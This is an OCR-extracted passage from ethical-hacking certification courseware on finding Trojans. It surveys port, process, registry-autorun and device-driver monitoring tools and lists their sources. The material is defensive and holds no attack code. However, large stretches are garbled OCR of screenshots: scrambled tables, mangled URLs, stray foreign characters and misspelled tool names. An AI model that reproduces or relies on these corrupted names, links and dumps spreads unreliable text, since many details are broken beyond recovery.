S T A B L IS H E D E S T A B L IS H E D C L O S E W A IT E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D LIS T E N IN G LIS T E N IN G E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D E S T A B L IS H E D S Y N S EN T SYN SEN T LIS T E N IN G LIS T E N IN G LIS T E N IN G = V‫׳‬ ]"<‫־‬ III Listening: 28 T im e W a it: 1 C lo se W a it: 1 I FIGURE 6.49: TCPView Tool Screenshot CurrPorts Tool Source: http://www.nirsoft.net CurrPorts allows you to view a list of ports that are currently in use and the application that is using the ports. You can close a selected connection and also terminate the process using it, and export all or selected items to an HTML or text report. It displays the list of all currently opened TCP/IP and UDP ports on the system. For each port in the list, information about the process that opened the port is also displayed, including the process name, full path of the process, version information of the process (product name, file description, etc.), the time that the process was created, and the user who created it. It allows you to close unwanted TCP connections, kill the process that opened the ports, and save the TCP/UDP ports information to HTML file, XML file, or tab-delimited text file. CurrPorts & Fit• Edit Vimw Oplioni H‫״‬iP Proutt N«‫״‬ PlOC«.. Protocol L I Port ocj lc«*i Pci. loc4l Add'au O System O System O System 0* System O System O System O System O System O System ® System O System O System 0 Unknown O Unknown O Unknown ® Unknown Unknown 864 1940 1940 90‫כ‬ 1376 864 476 1375 1940 1940 1940 9W 0 0 0 ‫ס‬ 0 UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP UDP TCP TCP TCP TCP TCP 5C 0 190: 3702 3702 3702 450: 5355 51225 59293 5929a 62056 6205C 4924a 49245 49252 sakmp ‫ ״‬dp W5*SCO_ as -J sco •n-ifaca.. [::1500 ]::‫0091:[ו‬ [::>3702 [::>3702 [::>3702 [::>4500 [::>5355 [::>53225 [fe80=b9ea:d01]::‫49295<ד‬ [::(62056 [::>62060 10.0.0.1249244 80 10.0.0.1249245 60 1000 1249252 S O 10.0.0.1249253 60 1000124925a S O 49253 4925a 53 Total Port* I Remote Conneetions, 1Seleeted _ ipsec-mdt Imnr R*n1 NxV.fl r>p.— R«mot•,.. A http http http http http v 1 hMp-/'www.ni»»till.‫ווו‬ FIGURE 6.50: CurrPorts Tool Screenshot Module 06 Page 951 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 126. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Scanning for Suspicious P rocesses CEH Trojans camouflage themselves as genuine Windows services or hide their processes to avoid detection Process Monitor is a monitoring tool for Windows that shows file system, registry, and process/thread activity Some Trojans use PEs (Portable Executable) to inject into various processes (such as explorer.exe or web browsers) UHU Processes are visible but looks like a legitimate processes and also helps bypass desktop firewalls Process Monitor - Sysinternals: vrww.sysinternals.com £ile L* Edit Troe 11:09: ‫>וו‬ ‫..מ‬ 1j »_ 1 Use process monitoring tools to detect hidden Trojans and backdoors Filter Tools & P‫־‬ 0c«s3 Name Explorer EXE Explow EXE ^ Explorer EXE^ ‫ ..:90:1 ו‬Explorer EXE* ^ 11:09:.. jbcpkxw tXE ^ j Ewkxw.EXE* 11:09:.. • ctrx* tx ■ ‫ ..:90:ור‬cans .exe ^ ‫!־■ ..:90:וד‬cans.ece ‫ ..:90:וד‬csns « e ■ 11:09:.. csrss exe ” 1 ‫..:מ:וו‬ Trojans can also use rootkit methods to hide their processes Event Ll fip tio n s V i © H elp I I £|a| ,, l*! . 3ID Operation Path Resit 5572 ^CreateFileMa... C:Prcgram Hes * 86)Nbz1 hnefo SUCCESS ll8 5572 rftRogOponKoy HKLMScftwaroMIo‫׳‬oooftV/r‫ »״‬w SUCCESS' 5572 5572 5572 5572 548 548 548 548 548 >48 RegGHjeiyValueHKLMvSOFTWAREWaoMftXMftn.. NAME NO‫־‬ StRegOcseKey HKLMS0 FTWAREM1 cro5o ftW n .. SUCCESS Create Hie C:Progran Hes X»6>Nbz1 hnto NAM ‫ ב‬NO lla ^ Q u c ty BasicInf.. .CAPregraai Ties xDG)Mjulla Ffcefo .. SUCCESS & R # *d F I# C:Window«Syct*m32cxee‫ ־‬dl v SUCCESS ‫ ־‬Read Fie A C :WindowsSystem 32csrs‫׳‬v dl SUCCESS RegQueryYalusHKLMS0 FTWAREM1 croscftWin.. SUCCESS ‫׳‬tjk Read Fie C:WindowsSystefn32sxs.dll SUCCESS & Read He C:W1ndowsSystem32sxs.dll SUCCESS rftRwQucrvKcv HKLM SXCESS Showing 3S9,3T5 c f 662,305 events (54%) Backed by virtu a l m em ory http://technet.microsoft.com Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. S can n in g for S usp icio u s P ro c e sse s There are various symptoms that can indicate that our system has been infected. The system suddenly becomes slow, downloading speed becomes slow, and the Internet's speed also comes down drastically. Attackers use certain rootkit methods to make the Trojan hide in the system where it can't be normally detected by antivirus software. These Trojans and worms usually enter into the system through pictures, music files, videos, etc. that are downloaded into the system. Initially, everything seems to be good but slowly they show effect in various ways. By using process monitoring tools, we can easily detect hidden Trojans, worms, and backdoors. Hidden Trojans and other kinds of vulnerabilities or viruses can be detected by scanning for suspicious processes. P rocess Monitor Source: http://technet.microsoft.com Process Monitor is a monitoring tool for Windows that shows real-time file system, Registry, and process/thread activity. It is used to analyze the behavior of spyware and dubious programs. Its features include rich and non-destructive filtering, comprehensive event Module 06 Page 952 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 127. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker properties such as session IDs and user names, reliable process information, full thread stacks with integrated symbol support for each operation, simultaneous logging to a file, etc. Process Monitor ‫ ־‬Sysinternals: www.sysinternals.com File Time 11:09 < Edit Event Filter Process Name (Explorer.EXE _‫ ־‬Explorer.EXE , ^(Explorer.EXE ,Explorer.EXE , Explorer.EXE 1 Explorer.EXE ■ 'csrss.exe ■ 'csrss.exe ■ 'csrss.exe ■ 'csrss.exe ■ 'csrss.exe ■ ' csrss.exe Tools PID 5572 5572 5572 5672 5572 5572 548 548 548 548 548 548 Options Help Operation Path Result ykCreateFileMa... C:Program Files fc86)M0zilla Firefo... SUCCESS rftRegOpenKey HKLMSoftwareMicrosoftWindow... SUCCESS 4 % RegQueryValueHKLMSOFTWAREMicrosoftWin... NAME NO‫־‬ ^RegQoseKey HKLMSOFTVAREMicrosoftWin... SUCCESS [^Create File C:Program Files fc86)M0zilla Firefo... NAME NO‫־‬ ykQuef>‫׳‬Basiclnf ..C:Program Files fc86)M0zilla Firefo... SUCCESS 2^ Read File C:WrKJcwsSystern32sxssrv.dll SUCCESS ^ Read File C:WindowsSystem32csrsrv.dll SUCCESS RegQueryValue HKLMXSO FTWAR EMicrosoftWin... SUCCESS Read File C:WindowsSystem32sxs dll SUCCESS Read File C:WindowsSystem32sxs.dll SUCCESS rftReaQuervKev HKLM _____________ SUCCESS & III Showing 359,375 of 652,305 events (54%) > Backed by virtual memory FIGURE 6.51: Process Monitor Module 06 Page 953 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 128. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker P rocess M onitoring Tool: W hat's R unning J e What's Running gives an inside look into your W indows operating systems C EH Microsoft Inspect the processes and get performance and resource usage data such as memory usage, processor usage, and handles e Information about dlls loaded, services running within the process, and IPconnections associated with processes Copyright 6 by EG-GtUIICil. All Rights Reserved. Reproduction is Strictly Prohibited P ro c e ss M o n ito rin g Tool: W hat’s R u n n in g ^ Source: http://www.whatsrunning.net What's Running gives you an inside look into your Windows system, such as 2000/XP/2003/Vista/Windows7. It explores processes, services, modules, IP-connections, drivers, etc. through a simple-to-use application. 9 P r oc es s e s : It inspects the processes and gives performance and resource usage data such as memory usage, processor usage, and handles. It gives all the details about dll:s that are loaded, services that are running within the process, and the IP-connections each process has 0 IP c o n n e c t i o n s : Q Services: Q Modules: It gives all the active IP connections in your system Inspects the services that are running and stopped Finds out the information about all dll:s and exe:s that are in use on your system Module 06 Page 954 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 129. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Drivers: It finds out the information about all drivers, for running drivers you can inspect the file version for finding the supplier of the drive System information: It shows crucial system information about your system such as installed memory, processor, registered user, and operating system and its version — W hat’s Running? 3.0 File View Startup Processes 79‫| ־‬ Snapshot Q $ ‫־‬ake snapshot t j Load Snapshot from file Compare snap with sa... © Upload Snapshot to ... _ Processes |□ Help X Start Process o Stop process 3 Select Process columns View delta Icons Get nfo onlne & Open folder , J- ihow processes in Tree A 11 ^ ‫! ■ ^ ^יידלת‬ ‫ר־׳ק‬ ‫ז אי‬ ^ rs- Services ■ 1701Gl Modi es349‫^ |־‬ Process Name lsass.exe wtnlogon.exe dwm.exe J explorer.exe igfxtray.exe hkcmd.exe igfxpers exe !{ft edpr_server.exe Q WinFLTray.exe M FLComServDrl.exe J Snagit32exe TscHelp.exe SnagPriv.exe C SnagitEdrtor exe splwow64.e. U hrefox exe P j P0WERPNT.EXE S mmc.exe vmconnect.exe googletalk exe !rt| EMET_notifier exe © chrome exe chrome.exe chrome.exe ^ chrome.exe ^ chrome.exe (£ ) chrome.exe £ ) chrome.exe Proces. User Name 616 SYSTEM 564 SYSTEM 868 600 Administrator 3908 Administrator 3936 Administrator 4028 Admintstrator 3140 Administrator 2224 Administrator 1036 Administrator 1396 Administrator 3268 Administrator 3532 Administrator 4120 Admmstrator 4324 Admmstrator 4420 Admmstrator 4304 Admmstrator 4200 Administrator 3372 Admristrator 3304 Administrator 3404 Admintstrator 4708 Administrator w•:. ‫■-״־;־‬ 1‫■״‬ ‫:־‬ • ,:i :4872 Admintstrator 2700 Admmstrator 5096 Admmstrator 3600 Admmstrator 2580 Admmstrator 2240 Admintstrator CPU 0.0 0.0 * 0.0 0.0 00 00 00 00 00 * 00 * 00 00 * 00 00 00 00 00 00 c c ► F ► ► ► C E C mn = * C 00 0.0 0.0 0.0 IP Connections ■ | * * Drivers• 279 | Q ‫ ״׳‬Startup-16 | 37 Prod KA ► ► ► 1 1 1 E F F c c c c c o Item 3 Process Properties Process ID Process Name Parent Process ID CPU Target ® Process 0 Memory Page Fault Count Peak Working Set,. Working Set Size Quota Peak Page,.. Quota Paged Pool... Quota Peak Non‫״.־‬ Quota NonPaged... Page Fie Usage Peak Page File Us... ® File Version 0 Time Creation Time Kernel Time User Time @I/ O System Info | 4856 chrome.exe 4708 0.0 Win32 58907 45948 K 37900 K 232 K 225 K 25 K 25 K 32364 K 37436 K 10/2/2012 5:4203 PM 00:00:00:390 00:00:03:853 ( Ul Objects 3 ,1 Services (0) ^ B [T Modules (46) Update interval:! seconds FIGURE 6.52: What's Running Tool Screenshot Module 06 Page 955 Ethical Hacking and Countermeasures Copyright © by EC‫־‬C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 130. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Process Monitoring Tools p PrcView i £•9 ht :// w .t a ci.c m tp ' w wemt o CEH Security Task Manager ht :/w w e br o tp / w .nu e.c m ‫־ ^ י‬ M % Winsonar Yet Another (remote) Process Monitor C h :/w w wy .cm ttp / w .fe bte o 4) HiddenFinder MONIT h :/w wwno tcm ttp / w . e pin. o ht :/m oit o tp / mn.c m Autoruns for Windows Process Monitor ht :/t c nt icoot o tp /ehe.mr s f.c m bF3 h :/ypomn or eog.nt ttp /a r c o.s ucf r e e h :/t c nt.mr s f.cm ttp /eh e icoot o KillProcess OpManager ht :/oa gla pot ae o tp / r ne ms fwr .c m ht :/w w a a enin.c m tp / w .mnge g e o Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. P ro c e ss M o n ito rin g Tools There are many process monitoring tools that you can use for the detection of Trojans installed on your system. These tools display a list of all the processes running or installed on your system. By analyzing the list you can identify the Trojans. These tools provide a comprehensive monitoring console for your entire network and IT infrastructure. They continuously and proactively monitor the entire IT system because of which any outages or performance degradations can be immediately identified and notified. In addition, it kills all the software that threatenss your computer, even if it is hidden. A few process monitoring tools are listed as follows: 9 PrcView available at http://www.teamcti.com 9 Winsonar available at http://www.fewbvte.com 9 HiddenFinder available at http://www.wenpoint.com 9 Autoruns for Windows available at http://technet.microsoft.com 9 KillProcess available at http://orangelampsoftware.com 9 Security Task Manager available at http://www.neuber.com 9 Yet Another (remote) Process Monitor available at http://yaprocmon.sourceforge.net 9 MONIT available at http://mmonit.com 9 Process Monitor available at http://technet.microsoft.com 9 OpManager available at http://www.manageengine.com Module 06 Page 956 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 131. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Scanning for Suspicious F n iv ta c J Windows automatically executes instructions in e Run e F d r g tr er r ,une e r g tr ju k ins e is y ros nedde is y n a dhlp indtetin r g tr e tr sce te n e s e c ge is y n ie r a d b To n y r ja s RunServices e RunOnce e RunServicesOnce S HKEY_CLASSES_ROOTexefil eshellopencommand | No rK ry :C V d w ir« {A X < M7 0 U» 74A * rd te X :« n » 1 trf» C a k » ‫י‬ « A1 N Uaid o tab E:vA«J»tatonsprt ?« :» lPspav 3nW R ther _‫״‬x/t-arvct N U81>o hat C:'LMer5AJmr1SrabrOedctooVrtfoi Setui IS O1j R ‫ י‬ther . N RUa<d>ttKr)1 C^I>e»VUm >ak»«aktopr«t« Sc«w> IS C1. at1 raM o> N Uanti o tat E:Vfe R ther pfcato 'Asctcason'freb* Set«9.0.1re nt NIKI trti ottw tat F• e tr»tn A p ‫׳‬wVksplr»tar*'FrH»» # 1re "%1" %*. sections of registry J Scanning registry values for suspicious entries may indicate the Trojan infection J http://www.macecraft.com Trojans insert instructions at these sections of registry to perform malicious activities Cbpyright © by EC-CMBCil. All Rights Jte$ervei;Reproduction is Strictly Prohibited. ^23‫ ־־‬S canning for S uspicious R e g istry E n tries — When a Trojan gets installed on the victim's machine, it generates a registry entry. W e can notice various changes; the first symptom is the system gets slower. Various advertisements keep popping up. So, scanning suspicious registries will help in detecting Trojans. Windows automatically executes instructions in the following sections of the registry: © Run 9 RunServices © RunOnce 9 RunServicesOnce Q HKEY_CLASSES_ROOTexefileshellopencommand "%1" %* Scanning registry values for suspicious entries may indicate a Trojan infection. Trojans insert instructions at these sections of the registry to perform malicious activities. r ‫ר‬ |J k jv l6 PowerTools 2012 -R egistry C leaner j Source: http://www.macecraft.com jvl6 PowerTools 2012 is the ultimate registry cleaner used to find registry errors and unneeded registry junk and helps in detecting registry entries created by Trojans. Module 06 Page 957 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 132. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker jv16 PowerTools 2012 [W8-x64] - Registry Cleaner Fte Select Iools Help 1 Entry’s name HKCRV-ocal Settings^oftwareWicrcsoftW ndowsShelV*mCa:he D: CEH■T:> lsSaltyBee.Exe.FriendlyAppName Value SaltyBee Entry last modified 01.10.2012,05:02 Key 0 Error seventy 25 Error descripbon MRU and other history data Fie reference D:CEH-T30lsV5altyBee.Exe ReasDn for detection Invalid file reference Tags Key / □ Q Entry's name Entry last modified Errcr severity Value Error desenpton In valid file or directory reference □ HCCR ® 71 — C:Wi1 dowsIns tallerYJAC76BA8 20.09.2012, 0 7 :% Fie or drectory ‫־‬C: C:WmdowsInstaller',{AC76BA86-7AD7-1033-7B44-A95000000001>XFDFFieJ □ HtCR E:Applicali0ns Intel_mul6-<tevice_A09_R30799 01.10.2012, 05:02 NRU and other htst<Er'Applications'Pell j4028r lpisplayIntel_multi-device_A09_R307992.exe □ HKG^C:VJsersAdmir Firefox 01.10.2012, 05:02 MRU and other hist( C:Users Administratorpesktop^irefox Setup 15.0. l.exe □ HKCR^C: VJsersAdmir Mozilla 01.10.2012, 05:02 □ «< ‫ ץ?ב‬E:Applications Firefox 01.10.2012, 05:02 2 5% MRU and other hist« E:ApplicationsAppliationsV= 6x Setup 9.0. Lexe iref □ HKCR^ E:Applications Mozilla 01.10.2012, 05:02 2 5% MRU and other hish E:AppiicationsApplications^irefox Setup 9.0. Lexe □ HKCR^C:Program File Atelie‫ ־‬Web Remote Commander 01.10.2012, 05:02 2 5% MRU and other hist( CiV^ogr am Files (x86)Atelier Web Remote Commander Proawrcp.exe 25% MRU and other hist( CrV^ogram Files (x86)Atelier WebV^emote Commander Proawrcp.exe □ HKCR^ C: Program File AtelieWeb Software 01.10.2012, 05:02 I KCR^ D:CEH-ToolsS SaltyBee MRU and other hist( C:VJsersAdministratorpesktop^iref6x Setup 15.0. l.exe 01.10.2012,05:02 | other Ns& C : YJsers Admm1stra tor downloads V.os tD00r_v 6SaltyBee.Exe □ HKCRC:UsersAdmir SaltyBee 01.10.2012, 05:02 2 5% MRU and □ HKCRD:CEH-ToolsC wireshark-win32-1.4.2.exe 01.10.2012, 05:02 2 5% MRU and other hist( D:CEH-T00lsCEHv8 Module 10 Denial of Service Wiresharkw1reshark-vwn32-l. □ HKCf^ C:UsersAdmirMicrosoft Visual Studio Premium 01.10.2012, 05:02 25% MRU and □ HKCRC:UsersAdmir Microsoft Corporation 01.10.2012, 05:02 2 5% MRU and other hist( C : VJsers Admm1s tra tor downloads vsjxemium.exe □ HKOA E:Appl1cations Intel.multi^evlce_A09_R30799 01.10.2012, 05:02 2 5% MRU and other hist( E: Appl1cabons^)ell j4028r lpisplayIntel_multi-device_A09_R307992.exe □ HKCU^C:UsersAdmir Firefox 6% MRU and < 01.10.2012, 05:02 III other hist( C:UsersAdmm1stratorpownloadsvs_premium.exe 1 other hist( GVUsersVAdmmistratorVDesktop^irefox setup 15.0. l.exe Custom fix... > | f Fix Delete Oose J Selected: 0, highlighted: 1‫ ׳‬total: 1492 FIGURE 6.53: j v l 6 PowerTools 2012 -Registry Cleaner Module 06 Page 958 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 133. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker -X R eg istry E ntry M o n ito rin g Tool: PC Tools R eg istry ^ M e c h a n ic Source: http://www.pctools.com PC Tools Registry Mechanic is an advanced registry cleaner that scans the registry values for suspicious entries created by Trojan infections. It fixes the Windows error and improves your system speed and maximizes software performance. It cleans up your system and secures your personal privacy. It keeps all your Internet and PC activities private and erases sensitive information permanently. Module 06 Page 959 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 134. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker PC To o ls | R egistry Mechanic PC T o o ls | R eg istry M echanic FIGURE 6.54: PC Tools Registry Mechanic Tool Screenshot Module 06 Page 960 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 135. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker R egistry Entry M onitoring Tools 5 Reg Organizer h :/w wc e t b .cm ttp / w . hm le o a 1 Irnm Registry Shower 1____j ht :/w w eiclok o tp / w .dv e c .c m Comodo Cloud Scanner SpyM e Tools ht :/w w ibos luios o tp / w .lc r so t n.c m ht :/w wo oo o tp / w .c md.c m Buster Sandbox Analyzer h :/ba o ae l ttp /s .is ftwr .n Regshot & All-Seeing Eyes La h :/w w re o o ttp / w .fot g.c m M J Registry Watcher ht :/w w c bmo tp / w .jaos .c m Active Registry Monitor ht :/w we isr s o e.c m tp / w .r g tyhwr o I CIE H ht :/r ght or e r e e tp /e s o.s ucfog.nt Registry Live Watch & h :/leluo b gpt ttp / e s ft. los o.in Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. R eg istry E ntry M o n ito rin g Tools In addition to jvl6 PowerTools 2012 - Registry Cleaner and PC Tools Registry Mechanic, there are many other tools that allow you to monitor registry entries and thus help detect Trojans installed, if any. A few of the registry entry monitoring tools that are mainly used for the purpose of cleaning the registry are listed as follows: 0 Reg Organizer available at http://www.chemtable.com 0 Registry Shower available at http://www.registryshower.com 0 Comodo Cloud Scanner available at http://www.comodo.com 0 Buster Sandbox Analyzer available at http://bsa.isoftware.nl 0 All-Seeing Eyes available at http://www.fortego.com 0 MJ Registry Watcher available at http://www.jacobsm.com 0 Active Registry Monitor available at http://www.devicelock.com 0 SpyMe Tools available at http://www.lcibrossolutions.com 0 Regshot available at http://regshot.sourceforge.net 0 Registry Live Watch available at http://leelusoft.blogspot.in Module 06 Page 961 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 136. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Scanning for Suspicious Device D rivers CEH Trojan Device Driver S cannin g for S uspicious D evice D riv ers When device drivers are downloaded from various sources that are not trustworthy Trojans may also get installed on the system. Trojans use these devices as covers to hide but by using device driver monitoring tools, we can identify if there is any Trojan present. Trojans are installed along with device drivers downloaded from untrusted sources and use these drivers as a shield to avoid detection. Scan for suspicious device drivers and verify if they are genuine and downloaded from the publisher's original site. Module 06 Page 962 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 137. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Trojan Device Driver cdrom.sys System information M . M* *•. H■* Sy1t*n Stm vr 2 P«e> jrc*< ■ [OTpcnwa - ScftHft Emvcmot Emormtnl ViTMbkt *P* i:p*x *rpoagr Nrt*Cft C&vyflore S4rac« Program V up -> * *o?•m, OU R*9«tfJbCf• Wntort Iror *♦pertryj *IptfKl .jpUO •ncfca •1<d1yn •nduu M fctH W Ovrrptor 3‫ז‬W OKI Com Inn* H p c‫«׳‬ Jwif* W »Cf040« ACH CfMf M KTCfOd ACUfcl O C riV f ACft Procvttcr Aggr«o*or.. A fowtr Meter Dretr CM A Wjkt Alwm Cfr.tf CM adit «d^a *dptfca •dpotTO Xn‫״‬ll«1j fuirto‫ ״‬Clr.tr (0«._ H « ACf Brt f«cr 1M) Ki PtMMW Dnnr AN©► r®l«»»o» Dirr*' *flxSuU *nvlibt cyandowsMc*«nd0‫.*ז*י‬cw«t40wfc.. CAwnaows'i.. cv«ndowfi.cma40w s* CVwtfowiUcWwviows's cwan40wfs~ ew 1ndow»»~ rvw*«40v<< CVnntowfS*.. cv»ndcmsrVwm dowtH c*nntfow »»‫״‬ e*m4av%* mo □ u » rf <«Ug«ry O n*, O Tyr* M‫׳‬nH Drwi KcmHOnrfr K«m 0*r.*r t< KcmH D m t Ktmri Drwtr Kemtl Dover K*»nrt Dnrff Kamri 0‫« ״‬ K«mrl O w KtmH Dnrft r#mM Pm*( KimHOn■*• KtmH Orw K«m«l D*w *‫׳‬ Ktrnri Otnet K«mri Orw K«Ml Brt* * N O N O VK m No No N O m No N O N O V»» N O No No N O No v UOM’W d <rt«gery n»m o ty »t n Go to Run ‫ >־‬Type m s i n f 032 ‫ ^־‬Software Environment ‫ >־־‬System Drivers ‫־‬ ‫־‬ Attacker FIGURE 6.55: Scanning for Suspicious Device Drivers Module 06 Page 963 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 138. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker D evice D rivers M onitoring Tool: DriverView J CEH DriverView utility displays the list of all device drivers currently loaded on system. For each driver in the list, additional information is displayed such as load address of the driver, description, version, product name, company that created the driver, etc. DnverView L File Edit View Options Help fa eg •3J 8 ‫־‬ d cdd.dti 9 TSDDDdll # winJ2k.sys 9 pa1sthtupe11e1.1ys ® vhdparsei.sys ® atyncmac syt » WPR0.4IJ001.jyj ‫ י‬wv.iyi * ♦ srv2.syt ♦ vhdmp.tyl • Fj0 epend1.sy* « ‫*(*•9י*ימ>י‬ ♦ wvneUys ■ 'dpdi.tyi > ‫ י‬npf.eyt » O NIProbeMenvSYS O WnVDfdrvG.tys * HTTP.syt < lunparsei.sys > ‫ י י‬eondrvsys 3 # storpott.jys # WmVDEdrv.sys mrjsmbiOiVj Address 0005X00X St- 0 0 90 000:0000X-ffOX 0000x 000P09000 000X00000162000 0000x 0016»»00 0000x 00 ‫ו‬t‫?׳‬t90 0 0 0005X00 6 ‫ו‬D O O 9 OO 000x1 16 00 000 901 0 0000x0016933000 0000X00 1 9 0 0 &W0 000X000 1 8 2 0 6100 000:000016900000 oooooootsfqooo 0000X001if9K)00 B»»W)'JIMOOO 000X000 1M O O UO 000X000 1M S7000 0000X00'5r4 0 C 80 0000x0015H9000 0000X001£ 8 0 ‫צ‬ 300 000X000 OICOOX 000x 000 isrooooo 0000X00 15WEM0 000x0001‫כ צ0צ‬ £0 0 0000x 001> 2yox D See tkOXttWOC C XJb O kO O C 010X09000 < X cd a> M !3 0 C Q X O1 h X to P} (M aO G naO O (k C OO O OO c O C OcO ttX O O C UOMO OOOO o>axaoooc 00020 10100 * 00 2 0 01 0 0 Load2 1 1 5 1 1 1 1 1 1 1 2 ‫ו‬ j (W O fcO O 1 XC O O O J1 O 0OOO 1 ftOWPcttH 1 04000000 1 * 0000000 ‫ו‬ 04X0*1000 1 OOXCMOO 1 k 1vy ‫׳‬x<w» 1 fraowooc ‫ו‬ O&OttOOC 1 <kX03900c ‫ו‬ Inc*‫ג‬ 12 s 14 2 13 2 ‫ו2 ו‬ 1 Si •*? 1S 4 17 4 16 4 15 4 11 5 10 5 12 4 11 4 10 4 l» 17 1 16 3 IB 14 1 14 5 13 4 "‫־‬ 14 4 ■‫״‬ file Type Dnvtf Display [>wf 0!5ptoy Driver System D r»«r 1 System 0r1*e System Oliver Net*orlr Oliver Unknown f*et*cA01‫«»׳‬ NetworfcD ‫׳‬ve» 1 Syltern D t im Viter‫ ״‬Differ Application NatAOfli Oiivef V,• a‫ ״‬R•‫•׳‬ <r 0‫׳׳‬v e» S 'rt"" D *r t*> $y*em DrNtr Unknown Syitcm 0 1v® 1 System Oliver V/flnr• Oliver Sytttm Diver Unknown S.-U0 T Oliver ! Desciip&on W1ndc«5 NT OpenType/Type 1... Canonical Display Driver Framebuffer Deploy Driver Multi-UserWin32Orrvw Pass thru parser Native VUG palter MSRemote Access serial networ... Version S.1.&234 6.2 4 00 .8 0 6 .8 0 1 .2 4 0 0 62.84000 6 .8 0 1 2 400 6 ?84000 6 ? 04000 Company Adobe System™ Microsoft Corp.. Microsoft Corp-. Microsoft Corp... Microsoft Corp... Microsoft Corp... Microsoft Corp... Strvtf dnvtt 5m t»2.0 Server drivn WD Miniport Dover Fik Sytfem Dependency Manag... TCP/IP Registry Compatibility 0... S«rv«t Netwoik On.‫וי‬ MHnmnn tICURITV Dk‫׳‬w > M.c‫׳‬osc« RDf Device !•director npf.ey*(NTV6 AM064) Kernel D... NiProbeMemfoeObserver Devie... 6 .8 0 1 2 400 02.64000 6.2.84000 62.8400.0 6 .8 0 1 .2 4 0 0 .. MOO. 4J.M.0 62.84000 4 1 .2 0 .0 0 1 1 .0 .0 6 .8 MiCfOJOftCorp.. Microsoft Corp... Microsoft Corp.. Microioft Corp... Mkrosoft Corp... MitiovoH Corp.. M iiw w n C Microsoft Corp.. CACI lochnoL. Network Insttu. HTTP Protocol Stick lun parser ConsoleDriver Mkmoft Storage Port Driver V UmI Encryption Drive ii lonahoin SM8 2 Redirector .0 6 .8 0 1 2 400 62.84000 6.?.8400 0 6 ,8 0 1 .2 4 0 0 7.0 .0 .0 62.8400.0 Microiolt Corp... Microsoft Corp.. Microsoft Corp.. Microsoft Coep... NewSoftwares.... Microsoft Coro... oxoooxt. a OXOOOXXOXOOOXC 0X000X10X000X1.. 000000x 10X000X10x000051oxoooo: 1oxooox 1‫״‬ 0X 00000-10X 00000-10X0000310x00005 1 .. 0X0000: 1 oxooox 1_ 0X0000:10X0000510X000031oxoooo: 10X00003 1 .. 00000003'1 0X0000310X0000:‫״‬ 1 5 item(i), 1Selected 5 http://www.nirsoft.net Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. D evice D riv ers M o n ito rin g Tool: D riverV iew Source: http://www.nirsoft.net The DriverView utility displays the entire currently loaded device drivers list in your system. Additional information is displayed for each and every driver in the list such as load address of the driver, description, version, product name, company that created the driver, etc. Instead of browsing for system components separately in Control Panel, just by running this application on your system you can easily know all the drivers on your system. This application displays the list of drivers that are on your system quickly and easily. It can create HTML reports. Module 06 Page 964 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
